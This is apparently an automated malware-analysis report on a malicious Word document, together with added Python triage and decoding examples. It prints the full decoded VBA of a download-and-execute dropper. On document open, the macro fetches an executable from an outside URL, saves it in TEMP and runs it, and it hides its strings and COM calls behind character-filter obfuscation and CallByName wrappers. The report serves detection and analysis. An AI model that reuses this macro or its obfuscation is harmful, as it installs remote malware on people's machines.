Verdict: MALICIOUS (Risk Score 330)
Malware Insights
MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1204.002 User Execution: Malicious File
- T1059 Command and Scripting Interpreter
The sample is a malicious Office document containing VBA macros. The macro does not call `Shell()`; it instantiates `WScript.Shell`, `MSXML2.ServerXMLHTTP.6.0` and `ADODB.Stream` via `CreateObject` and invokes their members through `CallByName` wrappers (module `SiovGt`), so that no member name ever appears next to the object it is called on. Every literal is passed through `AlJtwNCb.NzbElOh`, which returns the characters of its first argument that do not occur in its second; applying that filter to the literals in module `YEVWrnxjZw` recovers the download URL `http://magazinesemprebella.com/system/cache/word.exe`, the request header `User-Agent: Mozilla/4.0 (compatible;)`, the drop path (the `TEMP` value read through `WScript.Shell.Environment("PROCESS")` followed by `/6fb89e1802f1b5a1.exe`) and the member names `Open`, `SetRequestHeader`, `Send`, `ResponseBody`, `Type`, `Write`, `SaveToFile`, `Close` and `Exec`. `Document_Open` calls `YEVWrnxjZw.IdmgRsM`, which downloads the file, writes it with a binary `ADODB.Stream` and runs it with `WScript.Shell.Exec`, inside an `On Error GoTo` handler that swallows any failure. This is a download-and-execute dropper, consistent with the ClamAV name `Doc.Dropper.Donoff-5743530-0`; the second-stage payload is whatever that URL serves and is not contained in the document itself.
Heuristics (10)
- ClamAV: Doc.Dropper.Donoff-5743530-0 [critical] CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Dropper.Donoff-5743530-0
- VBA macros detected [medium, 5 related findings] OLE_VBA_MACROS: Document contains VBA macro code
- WScript.Shell usage [critical] OLE_VBA_WSCRIPT: WScript.Shell usage. Matched line in script (with context):
    Dim EodzZDPL As Boolean, FxaIym As String
    Set nMfUcbkG = CreateObject("WScript.Shell")
    End Function
- CreateObject call [high] OLE_VBA_CREATEOBJ: CreateObject call. Matched line in script (with context):
    Dim EodzZDPL As Boolean, FxaIym As String
    Set nMfUcbkG = CreateObject("WScript.Shell")
    End Function
- CallByName call [high] OLE_VBA_CALLBYNAME: CallByName call. Matched line in script (with context):
    Public Sub bgDKJRS(ByVal VyRpvV As Integer, ByVal xoqaDLo As Object, ByVal qwJny As String)
    CallByName xoqaDLo, qwJny, 1
    End Sub
- VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Document_Open macro [low] OLE_VBA_DOCOPEN: Document_Open macro. Matched line in script (with context):
    End Sub
    Private Sub Document_Open()
    Dim dWpVrc As Boolean
- Reference to Windows Script Host [high] SC_STR_WSCRIPT: Reference to Windows Script Host
- Suspicious extracted artifact [medium] EXTRACTED_FILE_STATIC_TRIAGE: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL [info] EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All five below are standard XMP/RDF and DrawingML namespace URIs from document metadata, found in document text (OLE body); the actual download URL appears only inside the macro, in obfuscated form:
    http://www.w3.org/1999/02/22-rdf-syntax-ns#
    http://ns.adobe.com/xap/1.0/
    http://ns.adobe.com/xap/1.0/mm/
    http://ns.adobe.com/xap/1.0/sType/ResourceRef#
    http://schemas.openxmlformats.org/drawingml/2006/main
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9059 bytes |

SHA-256: b22d299542f9dbed8fa502a715d024beebf3e6f6986ccbc4d66caeb5f869a881
Detection: ClamAV: No threats found (the Doc.Dropper.Donoff-5743530-0 match above is on the parent document, not on this decoded source file)
Obfuscation or payload: likely. 160 of 255 identifiers look randomly generated (e.g. 'ReXsGOpoqnOsOeqBGOoqdyG'), consistent with name-mangling obfuscation. That particular example is actually the encoded literal for `ResponseBody` rather than an identifier, but the procedure and variable names in the listing fit the same pattern.
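The "identifiers look randomly generated" check above is worth reproducing in your own triage pipeline. The following is an added example and not the analyzer's code: it splits each user-chosen VBA identifier into camelCase segments and treats a segment as word-like only when it has both vowels and consonants without long runs of either, then reports the fraction of identifiers in which fewer than half of the segments pass. The thresholds (two-letter minimum, run length 4, half-of-segments cut-off) are my own assumptions. The two VBA snippets are constructed inline: the first is copied from the preview below, the second is a benign stand-in.

```python
"""Added example: a name-mangling heuristic of the kind behind the
'identifiers look randomly generated' finding. Thresholds are assumed."""
import re

# VBA reserved words and built-in type names: not user-chosen, so excluded.
VBA_KEYWORDS = {
    "and", "as", "attribute", "boolean", "byref", "byval", "call", "case", "dim",
    "do", "double", "each", "else", "elseif", "end", "error", "exit", "false",
    "for", "function", "goto", "if", "in", "integer", "is", "let", "long",
    "loop", "me", "mod", "new", "next", "not", "nothing", "object", "on",
    "option", "or", "private", "public", "resume", "select", "set", "string",
    "sub", "then", "to", "true", "variant", "wend", "while", "with",
}
VOWELS = set("aeiouy")
STRING_RE = re.compile(r'"[^"\n]*"')
COMMENT_RE = re.compile(r"'[^\n]*")
IDENT_RE = re.compile(r"\b[A-Za-z_][A-Za-z0-9_]*\b")
# camelCase / ALLCAPS / digit segments, e.g. "tmRfIVJh" -> ["tm", "Rf", "IV", "Jh"]
SEGMENT_RE = re.compile(r"[A-Z]+(?![a-z])|[A-Z]?[a-z]+|\d+")


def identifiers(vba_source: str) -> set:
    """User-chosen identifiers in a VBA listing (string literals, comments and keywords removed)."""
    text = COMMENT_RE.sub("", STRING_RE.sub("", vba_source))
    return {tok for tok in IDENT_RE.findall(text) if tok.lower() not in VBA_KEYWORDS}


def _longest_run(s: str, vowels: bool) -> int:
    """Length of the longest run of vowels (vowels=True) or consonants (vowels=False)."""
    best = run = 0
    for ch in s:
        run = run + 1 if (ch in VOWELS) == vowels else 0
        best = max(best, run)
    return best


def word_like(segment: str) -> bool:
    """Assumed test for a pronounceable segment: two or more letters, both vowels
    and consonants present, and no run of four or more of either."""
    s = segment.lower()
    if len(s) < 2 or not s.isalpha():
        return False
    if not any(ch in VOWELS for ch in s) or all(ch in VOWELS for ch in s):
        return False
    return _longest_run(s, True) < 4 and _longest_run(s, False) < 4


def looks_random(name: str) -> bool:
    """Flag a name when fewer than half of its segments are word-like."""
    segments = SEGMENT_RE.findall(name)
    return sum(word_like(seg) for seg in segments) < len(segments) / 2


def random_identifier_ratio(vba_source: str) -> float:
    """Fraction of user identifiers that look machine-generated."""
    names = identifiers(vba_source)
    return sum(looks_random(n) for n in names) / len(names) if names else 0.0


# Constructed inputs: the first is copied from the script preview, the second is a benign stand-in.
OBFUSCATED_VBA = """
Private Sub fDZFHim(ByVal KXhrdA As String, ByVal zHbISYR As String)
wHTiRT
If mjspzU(9002, 675, "pHSUfIWtMS1") Then
jGxNa True, "Xm8sNzgkJFS", "7cctFI0k3FgWx2d"
QwNZHX
tmRfIVJh 807
End If
End Sub
Private Sub Document_Open()
Dim dWpVrc As Boolean
YEVWrnxjZw.IdmgRsM
End Sub
"""
BENIGN_VBA = """
Public Function SaveReport(ByVal fileName As String, ByVal rowCount As Integer) As Boolean
Dim outputPath As String
outputPath = ThisDocument.Path & "/" & fileName
SaveReport = rowCount > 0
End Function
Private Sub Document_Open()
Application.StatusBar = "Ready"
End Sub
"""

if __name__ == "__main__":
    for label, src in (("obfuscated", OBFUSCATED_VBA), ("benign", BENIGN_VBA)):
        print(f"{label}: {random_identifier_ratio(src):.2f} of identifiers look random")
```

Run on the snippet from this sample the ratio is above 0.9 (only `Document_Open` passes), while the benign stand-in scores 0.0. Hungarian-style prefixes such as `strURL` sit right at the cut-off, so in production the score should be one signal among several (CallByName density, CreateObject targets) rather than a verdict on its own.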
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub fDZFHim(ByVal KXhrdA As String, ByVal zHbISYR As String)
wHTiRT
If mjspzU(9002, 675, "pHSUfIWtMS1") Then
jGxNa True, "Xm8sNzgkJFS", "7cctFI0k3FgWx2d"
QwNZHX
tmRfIVJh 807
End If
End Sub
Private Sub AieuB(ByVal CcjoWhBh As Integer)
YoQROe 280, "luy5QYdPCP", 3880
nSBNYIEqi
szgGkotf 3197, "VEY3QBHYW", True
End Sub
Private Sub Document_Open()
' Auto-exec entry point: hands off to the dropper module YEVWrnxjZw
Dim dWpVrc As Boolean
YEVWrnxjZw.IdmgRsM
End Sub
Private Sub FDRSuguNZf()
mqxGfUKgzi 6499, "qUBEQcUuFXEWj", "k0YqWvHPfgo"
MmaltzrlX 1715
If hBTkqIt("PjLaitTZmv") Then
rRoMb
Else
yqyGeqxn
End If
End Sub
Private Function sRDnUwJHSD() As String
yhlAeROGu
sRDnUwJHSD = "VFaG1negNe6bV"
End Function
Attribute VB_Name = "AlJtwNCb"
Private Function AEkJuoQXn(ByVal SjFGXBSIZo As Boolean, ByVal QywIAsVIlU As String) As Boolean
aAnoEkmH
TYWXT
SIYNpFH
If bIFLsWSDYA Then
sjrIRNel
pIxxnGPm True, 5648
Else
oRDnv
GIOdryBDU
End If
AEkJuoQXn = False
End Function
' String decoder used for every obfuscated literal: returns the characters of OcSPG
' (the encoded string) that do not occur in BLrczxe (the filter alphabet).
' jNiMX.ViNpHGUzC is Mid(s, i, 1), jNiMX.mvDohfyl is InStr(...) <> 0, jNiMX.TpFOIGlDV is concatenation.
Public Function NzbElOh(ByVal OcSPG As String, ByVal BLrczxe As String) As String
Dim lZvgod As Boolean
Dim AXqlhEwBJM As String
crcNfikH = "yNlcbVjCGY"
For lZMFrSpy = 1 To Len(OcSPG)
lZvgod = jNiMX.mvDohfyl(jNiMX.ViNpHGUzC(lZMFrSpy, 5243, AjJJop, OcSPG), BLrczxe)
If Not lZvgod Then
NzbElOh = jNiMX.TpFOIGlDV(2102, True, jNiMX.ViNpHGUzC(lZMFrSpy, 5243, AjJJop, OcSPG), NzbElOh)
fitPL = "VkxeMRma7"
End If
Next
End Function
Private Function qgxwLgW() As Integer
ngHBnhTd 5855, 1524
UimfM
kCujVAMx
If zXmQhJr Then
vMylTY
ROzIu
End If
qgxwLgW = 5758
End Function
Private Function AjJJop() As String
AjJJop = "kgTosaNcQtJKyZ"
End Function
Attribute VB_Name = "CdauetYt"
Private Sub FVuRKIl(ByVal pmWuLilpm As Boolean, ByVal aIqbK As Integer)
JdrgwQ
End Sub
Public Function nMfUcbkG() As Object
Dim EodzZDPL As Boolean, FxaIym As String
Set nMfUcbkG = CreateObject("WScript.Shell")
End Function
Public Function yFOARrxkL() As Object
Set yFOARrxkL = CreateObject("MSXML2.ServerXMLHTTP.6.0")
End Function
Private Sub moqIyd()
If euVWF Then
EqgCajclK 1379, False, "kEZ7ikRgqZjN"
End If
End Sub
Private Sub Ixnbt(ByVal qhzmzrgK As String)
rwKYqDFg True, 2503
End Sub
Public Function QLILYAMDT() As Object
Dim joIhfWf As Boolean
Set QLILYAMDT = CreateObject("ADODB.Stream")
End Function
Private Function ttnweZ() As Integer
scmBSvpTk 2792
lJSsRbNCDs
jTPYG 698, True
upFcL "131Q7ACPrtPZO", "SD4TCKeu3IHqlc2", 3231
ttnweZ = 5750
End Function
Attribute VB_Name = "jNiMX"
Public Function ViNpHGUzC(ByVal iypWTXolxU As Integer, ByVal jczgA As Integer, ByVal oCpmeit As String, ByVal FEJfWi As String) As String
Dim HNuKWgufOM As Integer, PsDspeSF As Integer
ViNpHGUzC = Mid(FEJfWi, iypWTXolxU, 1)
End Function
Private Sub eXjGJd(ByVal zCMPR As Integer, ByVal dPzEeruZQc As String)
BkMTwPAnUV "DkDIO3d6F3v8Mi", 5936
vVjYXg 5637
If LYvcZvEUHc Then
ZkAFSHcy
RYUrsdm True
aVgAUZYDE 8658, "P6L2iKiDrLlkp", "PDySOMDaa"
End If
nnWkkdeYWI "91T1EaHzvPf58N", "UWH71R60USte", False
tvremm "rlrJFAUEIT", "HKcOUGSxKiDVYL", True
End Sub
Public Function TpFOIGlDV(ByVal YHmyK As Integer, ByVal siwdxix As Boolean, ByVal WrNacB As String, ByVal tCmhcnjaw As String) As String
TpFOIGlDV = tCmhcnjaw & WrNacB
End Function
Public Function mvDohfyl(ByVal QwewSsD As String, ByVal nlWobCMCMV As String) As Boolean
Dim nemKWAiIl As Integer
mvDohfyl = InStr(1, nlWobCMCMV, QwewSsD)
End Function
Attribute VB_Name = "SiovGt"
' CallByName wrappers so that COM member names never appear next to the object they are invoked on.
' CallType 1 = VbMethod, 2 = VbGet (property read), 4 = VbLet (property assignment).
Private Sub ClDEAxxw(ByVal IMxuPR As Boolean, ByVal UBQIToI As Integer)
QzYClH "FnNC3zJ5JxoN2U", 8941, "rCG482M5g"
End Sub
Public Sub bgDKJRS(ByVal VyRpvV As Integer, ByVal xoqaDLo As Object, ByVal qwJny As String)
CallByName xoqaDLo, qwJny, 1
End Sub
Public Sub uLMdQEzSM(ByVal EHhZvkvY As Variant, ByVal sZbhA As String, ByVal nQJGcyJuxH As Variant, ByVal loEiPnFEA As Object, ByVal quuPFeRPwX As Variant)
IXNhTW = "l2VZR9nD2"
CallByName loEiPnFEA, sZbhA, 1, EHhZvkvY, nQJGcyJuxH, quuPFeRPwX
End Sub
Public Function kHJDvJ(ByVal nYiINdSYPo As String, ByVal QimeyGm As Object, ByVal kKdMPKx As String) As Variant
Dim VmKBS As Integer, bAmMXC As Integer
Set kHJDvJ = CallByName(QimeyGm, nYiINdSYPo, 2, kKdMPKx)
End Function
Public Sub QavSmHwAdE(ByVal kXMXvgXM As Variant, ByVal UihLPcbp As String, ByVal LbRDnPIz As Integer, ByVal zwuHQkbdv As Variant, ByVal AvKZEdLCKg As String, ByVal ZdFxP As Object)
CallByName ZdFxP, UihLPcbp, 1, kXMXvgXM, zwuHQkbdv
End Sub
Public Sub HQvScqTefi(ByVal OnIWlzab As Boolean, ByVal Jmipofj As Variant, ByVal bNiRsuvF As Object, ByVal jXGWtA As String)
CallByName bNiRsuvF, jXGWtA, 4, Jmipofj
End Sub
Private Sub jIAMbLT(ByVal AEwBfCTeA As Integer, ByVal vOPGfq As Integer)
VYZRTX "PMlVAnnZYb"
FaPULoVT 5592, "iL2G7ATQq9s", "6nCQR9WtSsb"
End Sub
Public Sub lITquzHn(ByVal NIuVH As String, ByVal DGnrbz As Object, ByVal ltxCfvQYK As Integer, ByVal MWKWM As Variant, ByVal vvSEm As String)
CallByName DGnrbz, vvSEm, 1, MWKWM
End Sub
Public Function JvWgrglen(ByVal xfQxkqo As String, ByVal afGcAxt As String, ByVal dJYFud As Object) As Variant
Dim FzqRXM As Integer, UNYDxtaaT As Boolean
JvWgrglen = CallByName(dJYFud, afGcAxt, 2)
End Function
Attribute VB_Name = "YEVWrnxjZw"
' Main dropper module. Every literal below is decoded by AlJtwNCb.NzbElOh, which drops
' from its first argument every character that occurs in its second.
Private Function rvYdOAwcuH(ByVal aYERV As String, ByVal tqCeR As String) As String
Dim CylOKlM As Integer
' CallByName(WScript.Shell, "Environment", VbGet, "PROCESS"), then HWNSf(aYERV): reads a process environment variable
Set HWNSf = SiovGt.kHJDvJ(YRFtRyuOMI, CdauetYt.nMfUcbkG, AlJtwNCb.NzbElOh("P3RAWOVCVES3VS", ".A3VW"))
rvYdOAwcuH = HWNSf(aYERV)
End Function
Private Function XQQHRivB() As String
XQQHRivB = AlJtwNCb.NzbElOh("OYp4eCnC", "CY4 ")   ' -> "Open"
End Function
Private Function YRFtRyuOMI() As String
YRFtRyuOMI = AlJtwNCb.NzbElOh("E8nYYvGirbYoGnbm8eBnGt", "8bBGYX")   ' -> "Environment"
End Function
Private Function noPgfimLQl() As String
noPgfimLQl = "eJdybT86JRL"
End Function
Private Sub utuhmS(ByVal uKjCSio As String, ByVal qoqVV As String)
' Download uKjCSio (the URL) with MSXML2.ServerXMLHTTP.6.0, then hand ResponseBody to WKCFjIMPBW for file qoqVV
Set ttAvUNZbD = CdauetYt.yFOARrxkL
SiovGt.uLMdQEzSM OzsMX, AlJtwNCb.NzbElOh("OYp4eCnC", "CY4 "), uKjCSio, ttAvUNZbD, False   ' http.Open "GET", url, False
SiovGt.QavSmHwAdE AlJtwNCb.NzbElOh("UJsJJerj-JJAjgJeJnGt", "GJj"), YBKUEtVd, 2963, AlJtwNCb.NzbElOh("Mv5ovzviluvl5av/45v.0uv 5(cvvomv5pautuiuvbvle5;5u)", "5uv"), NbJTHGCP, ttAvUNZbD   ' http.SetRequestHeader "User-Agent", "Mozilla/4.0 (compatible;)"
SiovGt.bgDKJRS 1177, ttAvUNZbD, bcUkOw   ' http.Send
WKCFjIMPBW True, 6317, qoqVV, SiovGt.JvWgrglen(NbJTHGCP, tEVIdsD, ttAvUNZbD)   ' http.ResponseBody -> file qoqVV
End Sub
Private Function tEVIdsD() As String
tEVIdsD = AlJtwNCb.NzbElOh(".ReXsGOpoqnOsOeqBGOoqdyG", ".GXqO")   ' -> "ResponseBody"
End Function
Private Sub gbNWoi()
Dim HttjRmGJ As Integer
OIRUtHf = True
On Error GoTo ikwBA   ' any failure (download, write, exec) is silently swallowed
zIxdob = False
utuhmS XbpIXBreKI, qpfZb   ' download URL -> drop path
KpfAeitTid qpfZb   ' execute the dropped file
Exit Sub
ikwBA:
End Sub
Private Function qpfZb() As String
Dim TQUHiRmd As Integer, hIKrUpMu As Integer
' Drop path: the TEMP variable read through WScript.Shell.Environment("PROCESS") & "/6fb89e1802f1b5a1.exe"
qpfZb = rvYdOAwcuH(AlJtwNCb.NzbElOh("ZTEUMZsP", "9cZUsX"), "rlpEKNMdbrH3gcN") & ureCwD   ' NzbElOh(...) -> "TEMP"
End Function
Private Function HgLZFJd() As String
HgLZFJd = AlJtwNCb.NzbElOh("nTyHpaeB", "HBaqXn")   ' -> "Type"
End Function
Private Function ureCwD() As String
Dim duAGGyqSxo As Integer
Dim AhCLLHJB As Integer
JJNlxuFaS = True
ureCwD = yUuhMmQyGP
End Function
Private Sub KpfAeitTid(ByVal OGiVlfDvNr As String)
SiovGt.lITquzHn "G29r6KbTng", CdauetYt.nMfUcbkG, 7188, OGiVlfDvNr, AlJtwNCb.NzbElOh("kEx2eI1c", "k31IG2")   ' WScript.Shell.Exec path
End Sub
Private Function NbJTHGCP() As String
NbJTHGCP = "g81SabjfIw6"
End Function
Public Sub IdmgRsM()
' Entry point called from ThisDocument.Document_Open
Dim ZcKzmV As Integer
Dim ZJXOxiAU As Boolean
kZsag = 4121
gbNWoi
End Sub
Private Function NPLIiMfm() As String
NPLIiMfm = AlJtwNCb.NzbElOh("YClm/o/s0e", "0dY/m")   ' -> "Close"
End Function
Private Function XbpIXBreKI() As String
Dim nTCnT As Integer
' -> "http://magazinesemprebella.com/system/cache/word.exe"
XbpIXBreKI = AlJtwNCb.NzbElOh("hBtYUtpYU:Y//YmYaYBgUaBzYinUBesYeUYmUprUeYbBeYlUlBUaU.cYoBYmB/UsBysUtYeUmUY/BcUacBhBeUY/UwoBrUUdY.eYYxUe", "YUB")
End Function
Private Sub WKCFjIMPBW(ByVal nYjlPOglL As Boolean, ByVal Qhqsj As Integer, ByVal mFQrVpW As String, ByVal InZuOq As Variant)
' Write the response body InZuOq to file mFQrVpW through ADODB.Stream
Dim nIDzD As Boolean
Dim OGwEZVg As Integer
Set iIHcTWxaSP = CdauetYt.QLILYAMDT
SiovGt.HQvScqTefi True, 1, iIHcTWxaSP, HgLZFJd   ' stream.Type = 1 (adTypeBinary)
SiovGt.bgDKJRS 1177, iIHcTWxaSP, XQQHRivB   ' stream.Open
uRUxACPwrk = 5904
SiovGt.lITquzHn noPgfimLQl, iIHcTWxaSP, 7188, InZuOq, AlJtwNCb.NzbElOh("Wbbribtzek", "Zzlmkb")   ' stream.Write body
sIbLjqP = "zGfxeChfYk2NCyH"
SiovGt.QavSmHwAdE mFQrVpW, nAsYQtvB, 2963, 2, noPgfimLQl, iIHcTWxaSP   ' stream.SaveToFile path, 2 (adSaveCreateOverWrite)
SiovGt.bgDKJRS 1177, iIHcTWxaSP, NPLIiMfm   ' stream.Close
End Sub
Private Function OzsMX() As String
XBoKEL = False
OzsMX = AlJtwNCb.NzbElOh("G.E TB", ".BA ")   ' -> "GET"
End Function
Private Function nAsYQtvB() As String
nAsYQtvB = AlJtwNCb.NzbElOh("pSraUvremToVUFimlVed", "mprdUV")   ' -> "SaveToFile"
End Function
Private Function yUuhMmQyGP() As String
yUuhMmQyGP = AlJtwNCb.NzbElOh("/76owfbV879w4eo1o8w027fw14Vb5V7a41o.VeoxeV", "V7wo4")   ' -> "/6fb89e1802f1b5a1.exe"
End Function
Private Function YBKUEtVd() As String
YBKUEtVd = AlJtwNCb.NzbElOh("SEehtELReLlqhuelshhtLHhepaldlelr", "ELlhp")   ' -> "SetRequestHeader"
End Function
Private Function bcUkOw() As String
bcUkOw = AlJtwNCb.NzbElOh("SIerIndr", "MIrG")   ' -> "Send"
End Function
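To show how the literals in the listing are recovered and what the `CallByName` wrappers actually dispatch, here is an added Python re-implementation; it is not part of the sample or of the analyzer. `strip_chars` mirrors `AlJtwNCb.NzbElOh`, the encoded/filter pairs are copied verbatim from the `NzbElOh` calls above, and `TraceObject` is a constructed stand-in that records each COM dispatch instead of performing it, so nothing is downloaded or executed. The `VB_METHOD`/`VB_GET`/`VB_LET` values are VBA's `CallByName` constants, matching the 1, 2 and 4 passed by the `SiovGt` wrappers; `%TEMP%` is written in place of the directory the macro reads through `WScript.Shell.Environment("PROCESS")`.

```python
"""Added example: decode the macro's string obfuscation and replay its CallByName
dispatch chain offline. Nothing here touches the network or starts a process;
TraceObject only records what the sample would call."""

VB_METHOD, VB_GET, VB_LET = 1, 2, 4  # VBA CallByName CallType values used by the macro


def strip_chars(data: str, bad: str) -> str:
    """Re-implementation of AlJtwNCb.NzbElOh: keep each character of `data`
    that does not occur in the filter alphabet `bad`."""
    return "".join(ch for ch in data if ch not in bad)


# (encoded literal, filter) pairs copied verbatim from the NzbElOh calls in the listing.
ENCODED = {
    "url": ("hBtYUtpYU:Y//YmYaYBgUaBzYinUBesYeUYmUprUeYbBeYlUlBUaU.cYoBYmB/UsBysUtYeUmUY/BcUacBhBeUY/UwoBrUUdY.eYYxUe", "YUB"),
    "env_prop": ("E8nYYvGirbYoGnbm8eBnGt", "8bBGYX"),
    "env_scope": ("P3RAWOVCVES3VS", ".A3VW"),
    "env_var": ("ZTEUMZsP", "9cZUsX"),
    "drop_name": ("/76owfbV879w4eo1o8w027fw14Vb5V7a41o.VeoxeV", "V7wo4"),
    "open": ("OYp4eCnC", "CY4 "),
    "verb": ("G.E TB", ".BA "),
    "set_header": ("SEehtELReLlqhuelshhtLHhepaldlelr", "ELlhp"),
    "header_name": ("UJsJJerj-JJAjgJeJnGt", "GJj"),
    "header_value": ("Mv5ovzviluvl5av/45v.0uv 5(cvvomv5pautuiuvbvle5;5u)", "5uv"),
    "send": ("SIerIndr", "MIrG"),
    "body": (".ReXsGOpoqnOsOeqBGOoqdyG", ".GXqO"),
    "stream_type": ("nTyHpaeB", "HBaqXn"),
    "write": ("Wbbribtzek", "Zzlmkb"),
    "save": ("pSraUvremToVUFimlVed", "mprdUV"),
    "close": ("YClm/o/s0e", "0dY/m"),
    "exec": ("kEx2eI1c", "k31IG2"),
}


def decode_all() -> dict:
    """Every obfuscated literal from the listing, decoded."""
    return {key: strip_chars(enc, bad) for key, (enc, bad) in ENCODED.items()}


class TraceObject:
    """Constructed stand-in for a COM object: logs each CallByName dispatch as
    'ProgID.Member [kind] args' instead of performing it."""

    def __init__(self, progid: str, log: list):
        self.progid, self.log = progid, log

    def call_by_name(self, member: str, call_type: int, *args):
        kind = {VB_METHOD: "method", VB_GET: "get", VB_LET: "let"}[call_type]
        self.log.append(f"{self.progid}.{member} [{kind}] {args}")
        return f"<{self.progid}.{member}>"  # placeholder for the returned value


def replay_document_open() -> list:
    """Document_Open -> IdmgRsM -> gbNWoi, with the decoded strings and the same
    CallType values the SiovGt wrappers pass (bgDKJRS/uLMdQEzSM/QavSmHwAdE/
    lITquzHn use 1, kHJDvJ/JvWgrglen use 2, HQvScqTefi uses 4)."""
    s, log = decode_all(), []
    shell = TraceObject("WScript.Shell", log)
    http = TraceObject("MSXML2.ServerXMLHTTP.6.0", log)
    stream = TraceObject("ADODB.Stream", log)
    # qpfZb(): drop path = shell.Environment("PROCESS")("TEMP") & "/6fb....exe";
    # "%TEMP%" stands in for the resolved directory (assumption for the trace).
    shell.call_by_name(s["env_prop"], VB_GET, s["env_scope"])
    drop_path = f"%{s['env_var']}%{s['drop_name']}"
    # utuhmS(): fetch the URL with a spoofed User-Agent.
    http.call_by_name(s["open"], VB_METHOD, s["verb"], s["url"], False)
    http.call_by_name(s["set_header"], VB_METHOD, s["header_name"], s["header_value"])
    http.call_by_name(s["send"], VB_METHOD)
    body = http.call_by_name(s["body"], VB_GET)
    # WKCFjIMPBW(): binary ADODB.Stream (Type=1), SaveToFile mode 2 = create/overwrite.
    stream.call_by_name(s["stream_type"], VB_LET, 1)
    stream.call_by_name(s["open"], VB_METHOD)
    stream.call_by_name(s["write"], VB_METHOD, body)
    stream.call_by_name(s["save"], VB_METHOD, drop_path, 2)
    stream.call_by_name(s["close"], VB_METHOD)
    # KpfAeitTid(): run what was just written.
    shell.call_by_name(s["exec"], VB_METHOD, drop_path)
    return log


if __name__ == "__main__":
    for line in replay_document_open():
        print(line)
```

The trace reads top to bottom as the dropper's behaviour: environment lookup, `Open`/`SetRequestHeader`/`Send`/`ResponseBody` on the HTTP object, `Type`/`Open`/`Write`/`SaveToFile`/`Close` on the stream, then `Exec` on the shell. The same `strip_chars` table is what you would feed a YARA or Sigma author: the filter alphabets and encoded literals are stable indicators of this build even though none of the decoded strings appear in the file.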